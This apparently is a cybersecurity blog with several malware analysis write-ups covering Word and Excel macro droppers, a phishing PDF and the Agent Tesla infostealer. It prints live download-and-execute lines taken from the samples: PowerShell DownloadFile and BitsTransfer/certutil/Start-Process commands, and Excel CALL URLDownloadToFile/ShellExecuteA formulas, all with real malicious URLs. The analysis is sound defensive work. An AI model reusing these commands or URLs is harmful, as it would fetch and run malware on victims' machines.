Word Macro Malware Analysis

June 12, 2020July 9, 2020 Anurag GawandeLeave a comment

SHA256: dd81d70fa14f0e95b8cd2fe86a9a21a264cbb4bb32d80c4195fc13ee6791b994

File Type: Microsoft Word

File Extension: .doc

I am going to use OLETools to analyse this word document sample. For initial document analysis I rely on this tool, if

you have read my earlier blog posts on word macro analysis, you can see I have used this tool.

>>oleid.py <word document file>

>>olevba.py -a <word document file>

VBA macro analysis:

Macro will execute on document open.
It may open/write binary file on the system
It has hex strings
It has base64 obfuscated strings.

I can deobfuscate the base64 obfuscated base64 string using oldvba command

>>olevba.py --decode <word document file>

but I would open VBA developer tool and debug the VBA code.

_{To view macros navigate to View >> Macros >> View Macros}

There is no macro available to Step into because macro is password protected.

Open VBA developer tool by pressing Alt+F11

To remove password, I will use code written by ndthanh link to the code is here Github

To use this code, right clicked on Project >> Insert >> Module it will open empty code window, copy paste code here.

Click on Run >> (Macro Name) unprotected

and password is removed and project is unlocked.

_{Document_Open() executes on opening word document.}

VBA has forms and modules.

Forms

pfoi23hj
roihwo23

Macro Modules

ajbhk3h43
bcsjw
bklern4jh

I put a breakpoint and started debugging modules and got the list of URL’s it tries to connect

URLs Obfuscated base64 strings

aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n
aHR0cDovL2ZsaXBrZW55YS5jb20vbnVqYXpid3JoankvODg4ODg4OC5wbmc=
aHR0cDovLzEweDQ1LmNvbS96ZmJqdnZxeGt0eC84ODg4ODg4LnBuZw==
aHR0cDovL2lhbXBsb3llZC5ubC9sYmJpdWpkeWp5Lzg4ODg4ODgucG5n
aHR0cDovL2FwdG9jaXVkYWRhbXVyYWxsYWRhY2FydGFnZW5hLmNvbS9nZGRxZXovODg4ODg4OC5wbmc=
aHR0cDovL2F1dG9lc2NvbGFjaWdhbm9zLmNvbS5ici9nZXp6Zi84ODg4ODg4LnBuZw==

After deofuscated base64 URLs

http://salwadm . com/tcphx/8888888.png	VT Score
http://flipkenya . com/nujazbwrhjy/8888888.png	VT Score
http://10×45 . com/zfbjvvqxktx/8888888.png	VT Score
http://iamployed . nl/lbbiujdyjy/8888888.png	VT Score
http://aptociudadamuralladacartagena . com/gddqez/8888888.png	VT Score
http://autoescolaciganos . com . br/gezzf/8888888.png	VT Score

Code also drops BAT file tmp.bat and execute it to create a directory tmpdir at location C:\Users\Public\

_{location C:\Users\Public where bat file dropped}

Next code deobfuscate string by replacing a letter by its preceding letter. E.g. ‘Q’ will be replaced with ‘P’

Below is the PowerShell Command with obfuscated string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL3NhbHdhZG0uY29tL3RjcGh4Lzg4ODg4ODgucG5n')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')

Deobfuscated base64 string

powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('http://salwadm . com/tcphx/8888888.png')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('C:\Users\Public\tmpdir\file')) + '1' + '.e' + 'x' + 'e')

PowerShell script download an executable file file1.exe from the URL. After taking closer look at this file, its a html page with .exe extension.

I have uploaded this file to VirusTotal and the was zero detection as malware.

SHA256: 3b11440abf602e0ac35a8a1489ed26ec0103ed2ba636520761c698e5fb2df9d1

Summary:

On document opening, forms execute.
Drops bat file which create a folder on victim’s machine
Executes PowerShell script which downloads a file from one of the multiple sources of URLs.
Look for antivirus protection, real time protection values in registry.

Word Macro Malware Analysis

May 15, 2020July 9, 2020 Anurag Gawande4 Comments

Hash: 98fe0b166f550446cbf9e0f368eb8bea79d2eec29fa033cee1ff8f8e38a12836

Sample Download Source: beta.virusbay.io

File Type: Microsoft Word Document

File Format: .doc

VirusTotal Scrore: 32/62

Document Preview:

File Property:

cmd> olemeta.py <filename>

Document Macro Analysis:

cmd> olevba.py -a <filename>

Document_Open macro executes on opening document.

The first thing I was trying to access Macro. By default it was disabled, to enable it go to Files > Options > Trust Center > Macro Settings > Select Enable all macros and select checkbox Trust access to the VBA project object mode

Post enabling macro, I navigate to View > Macros > View Macros

There are macros in document.

I tried to step into Document_Open macro which executes on document open. But I got an error Project Locked and Project is unenviable.

To make it viewable, I downloaded tool EvilClippy. This tool create new copy of word document in same directory as your current document.

Now when I open document which is project viewable and open VBA Development tool by pressing F11 and tried to open macro code, I was getting Project Password prompt.

To remove/bypass this password, there is a VBA code, Git hub link

I am going to create a new module and paste this code there and run the macro unprotected

Debugging Macro

I started debugging macro code and found below code runs PowerShell command

PowerShell that written to location C:\Users\<profile>\AppData\Roaming\Temp\

PowerShell command that executes via command line.

powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p

PowerShell connects to the below URLS and save files vido.com, rTTj.com and sfera to location C:\Users\<user>\AppData\Local\Temp

http://neoneo-bg . site/hIeak.dat
http://neoneo-bg . site/geTask.dat
http://neoneo-bg . site/rTTj.dat

I tried to debug the PowerShell script but the URL is no more accessible. Sadly, I couldn’t download the files those gonna download by this script.

http://neoneo-bg.site/hIeak.dat

VirusTotal Score: 5/71

http://neoneo-bg.site/geTask.dat

VirusTotal Score: 7/71

http://neoneo-bg.site/rTTj.dat

VirusTotal Score: 5/71

Summary:

On opening document, word macro executes PowerShell command.
PowerShell command downloads file to Temp folder.

Thank you. Please post comments for suggestions.

Excel 4.0 macro Trojan Downloader – Malware Analysis

May 4, 2020July 9, 2020 Anurag Gawande8 Comments

Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c

Sample Download Link: beta.VirusBay.io

Application Name: Microsoft Excel

File Type: xls

VirusTotal Score: 29/60

I came across this sample on VirusBay.io. I downloaded this malicious excel file on my VM for malware analysis.

OLEVBA.py

First thing I did analysis of VBA macro source code in excel file using OLETools.

Command > OLEVBA.py -a

The result shows, macro will auto execute on opening file and it may run executable file may be using shell command and will download a file from remote server. The executable file name is FBpKzqF.exe

Document Property:

XLM macro has been used in this file which is hidden.

Steps To Make Macros Sheet Visible

Step 1

I enabled it by right click on the spreadsheet which is open in Excel and selected Unhide…

And then a popup shows the name of spreadsheet I will select to unhide. Here name of sheet is SODXOFScMLy.

Step 2

Along with this need to unblock the excel file and can be done by right click on excel file > General Tab > check option Unblock. I ran OLEVBA to check the visibility status of macro and now it turned to visible.

While going through spreadsheet, I searched for keywords those I found in macro extracted using tool OLEVBA

OLEVBA macro extracted show a string value of C:\ProgramData\FBpKzqF.exe

So I tried to look for .exe in spreadsheet, I was sure I will get something here and I found a link of a website http:// gstat.dondyablo .com/ fattura.exe here fattura.exe is just a html page. (VirusTotal link here)

Verification of above URL on VirusTotal shows URL is up and malicious and scores 17/79.

I also did NSLookUp for URL. There are three IPs assigned to this site. First 2 from Russia and third one from Netherlands.

Next I started looking for formula and Call functions in columns as I saw them in extracted macro by olevba.py. (screenshot below)

I started with Call function, right click and run this call function.

Click on Step in.

Click on Evaluate will evaluate the values of parameters of call.

Post Evaluation

=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)

Here the value of

$BZ$118 = “URLMON”

$HT$559 = “URLDownloadToAFile”

$BB$54 = “http:// gstat.dondyablo .com/ fattura.exe”

$GI$1024 = “C:\ProgramData\FBpKzqF.exe”

call("URLMON","URLDownloadToAFile","JJCCJJ",0,
"http:// gstat.dondyablo .com/ fattura.exe", 
"C:\ProgramData\FBpKzqF.exe")

There is another call function, I am evaluating to get the value of this call function.

=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)

$H$24 = “Shell32”

$GD$694 = “ShellExecuteA”

$I$1161 = “open”

$GI$1025= “C:\ProgramData\FBpKzqF.exe”

=Call("Shell32", "ShellExecuteA", "JJCCJJ", 
"open", "C:\ProgramData\FBpKzqF.exe",,0,0)

Looking at these two call functions, I can say

The first call function will download the executable file from the URL
The second call function will execute the executable file on victims machine.

Next I will test, enable Internet on my VM and will run first call function instead of step in which will download the executable.

Network Log:

Network log shows connection made to IP address 195. 22. 152. 76 and IP address resolved to DNS gstat. dondyablo .com

Below image shows, it is downloaded ms dos application.

URL is hosted on Apache server and host server is Ubuntu.

Process Explorer:

Process explorer capture the TCP connection with remote IP address and download the executable file at two location

C:\ProgramData\FBpKzqF.exe
CC:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\fattura[1].exe (temp location)

Downloaded Executable File Information

File name: FBpKzqF.exe

File Type: Win32 EXE

Hash: cddf3cc072913f9e5b0a020b12a0d80184b34a82f6ea6f8f7e95475a87de268c

VirusTotal Score: 50/70

Summary

Excel file is Excel 4.0 macro in hidden spreadsheet (SODXOFScMLy)
Macro call functions download executable FBpKzqF.exe
“http:// gstat.dondyablo .com/ fattura.exe” from where executable downloaded.
downloaded executable file is a trojan malware.

PDF malware analysis

May 1, 2020July 9, 2020 Anurag Gawande2 Comments

Hash: d26a7e67cda125f11270af0a820f6644cf920ed70fd5b166e82757dabb6d1ee0

Download sample link: Here

File type: PDF

VirusTotal score: 27/54

PDF Document Preview

P DFiD

I have used PDFiD tool to analyse the header of pdf file. Observed file contains 24 URL’s.

Next step is to extract URL’s from the document. I will use two tools here to perform this, pdf-parser and PDFStreamDumper.

pdf-parser

I am using pdf-parser tool to extract only the list of URL’s from this document. for that I am navigating to the pdf-parser folder and executing command. pdf-parser is python script.

pdf-parser.py -k /URI <.pdf file>

There are these 5 URLs extracted from the pdf document.

(http://www.diamondcreationslb . com/doc/rdd.htm)
(http://ruseuropharm . ru/tobi/index.php)
(http://tcil-bd . com/tin-count/zigi/index.php)
(http://tcil-bd . com/wp-includes/IXR/alen/index.php)
(http://tcil-bd . com/dfp/index.php)

PDFStreamDumper

PDFStreamDumper is very handy tool with GUI. This loads all objects in PDF file and show in Text, Hex format. Opening malicious pdf file in PDFStreamDumper, I can see URL’s under objects. To get all the URL’s I will have to go through all objects from the left panel one by one.

E.g.

URL Verification

http://www.diamondcreationslb . com/doc/rdd.htm

Report : Phishing

http://ruseuropharm . ru/tobi/index.php

Report: Phishing

Status: 404

http://tcil-bd . com/tin-count/zigi/index.php

Report: Phishing

Status: 404

http://tcil-bd . com/wp-includes/IXR/alen/index.php

Report: Phishing

Status: 404

http://tcil-bd . com/dfp/index.php

Report: Phishing

Status: 404

Summary:

PDF File has URL’s embedded.
All URLs are phishing.

Trojan Agent Tesla – Malware Analysis

April 5, 2020February 8, 2025 Anurag Gawande4 Comments

Hash – 077f75ef7fdb1663e70c33e20d8d7c4383fa13fd95517fab8023fce526bf3a25

Family : Agent Tesla

Downloaded Sample Link: Click here

Signature: Microsoft Visual C# v7.0/ Basic.NET

Filename: UIhLdVHHlUAKoEOpjVAsXFlIQrgS.exe

VirusTotal score:

Malware behavior:

Steal browser information (URL, Usernames, Passwords)
Steal passwords for email clients.
Steal FTP Clients
Steal download manager passwords.
Collect OS and hardware information.

Browser Information:

When I debug the malware executable, Initially it creates a SQLite database to store collected information from victims machine.

Below are the tables getting created.

Tables created:

meta
logins
sqlite_sequence
stats
compromised_credentials

found it collected browsers data (Google chrome), that includes accessed URLs and related usernames and passwords.

database table logins stores all browser related information. Below are the table columns.

Apart from this, malware also look for all different types of browsers to steal data from it.

It look for below browsers:

Opera Browser
Yandex Browser
360 Browser
Iridium Browser
Comodo Dragon
Cool Novo
Chromium
Torch Browser
7Star
Amigo
Brave
CentBrowser
Chedot
Coccoc
Elements Browser
Epic Privacy
Kometa
Orbitum
Sputnik
Uran
Vivaldi
Citrio
Liebao Browser
Sleipnir 6
QIP Surf
Coowon

Below screenshot taken while debugging malware.

Malware also look for below email clients. I haven’t install any of them on my machine during analyzing this.

Email Clients:

Outlook
Thunderbird
Foxmail
Opera Mail
Pocomail
Claws-mail
Postbox

FTP Clients:

Malware grabs credentials from FTP clients as well. Below list.

FileZilla
Core FTP
SmartFTP
FTPGetter
FlashFXP

It also makes FTP web request. (Remote Server couldn’t find)

It uses smtp client to send information over the network using port 587 which indicates sending data from smtp client to a particular smtp Server through mail attachments.

Malware executable also make HTTPWebRequest which must be downloading SMTP client to transfer data to remote SMTP server.

unfortunately, it didn’t make any connection to any remote server address.

Summary:

Steal Browser Information including urls, usernames and passwords.
Steal email client credentials.
Steal credentials of FTP servers.
Computer information.

Thank you.

Malware Analysis, Phishing, and Email Scams

Cybersecurity Blog

Word Macro Malware Analysis

Word Macro Malware Analysis

Excel 4.0 macro Trojan Downloader – Malware Analysis

PDF malware analysis

Trojan Agent Tesla – Malware Analysis